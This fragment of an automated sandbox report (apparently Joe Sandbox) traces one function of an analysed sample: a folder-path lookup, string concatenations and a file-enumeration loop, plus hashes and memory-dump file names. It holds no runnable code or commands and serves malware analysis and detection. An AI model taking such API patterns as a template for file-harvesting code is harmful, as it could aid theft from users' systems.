                    • Opcode Fuzzy Hash: 9887d07de8dbd9e90ddb49f24371886aa2c4ede70d8cc5d4f0f7793046b54883
                    • Instruction Fuzzy Hash: 7BF049329056029ADB21BBA89846B4EBBE0AF00721F2141CBF404AB3D2FF645D41DE5A
                    Function 00BD4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BD8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD4F7A
                    • lstrcat.KERNEL32(?,00BE1070), ref: 00BD4F97
                    • lstrcat.KERNEL32(?,013C9168), ref: 00BD4FAB
                    • lstrcat.KERNEL32(?,00BE1074), ref: 00BD4FBD
                      • Part of subcall function 00BD4910: wsprintfA.USER32 ref: 00BD492C
                      • Part of subcall function 00BD4910: FindFirstFileA.KERNEL32(?,?), ref: 00BD4943
                      • Part of subcall function 00BD4910: StrCmpCA.SHLWAPI(?,00BE0FDC), ref: 00BD4971
                      • Part of subcall function 00BD4910: StrCmpCA.SHLWAPI(?,00BE0FE0), ref: 00BD4987
                      • Part of subcall function 00BD4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00BD4B7D
                      • Part of subcall function 00BD4910: FindClose.KERNEL32(000000FF), ref: 00BD4B92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                    • String ID:
                    • API String ID: 2667927680-0
                    • Opcode ID: a2966d744dcb0189c12990297c7f3dacd0e317797cb1b87777722c3974608383
                    • Instruction ID: 14946d8b178c7b80cd18e59027f3be2b3714446415f9c818cf64658eabd0937b
                    • Opcode Fuzzy Hash: a2966d744dcb0189c12990297c7f3dacd0e317797cb1b87777722c3974608383
                    • Instruction Fuzzy Hash: 5621C87690030C6BC754FB71DC46EED73BCAB54300F0045E9B699A2192EE759ACD8BA2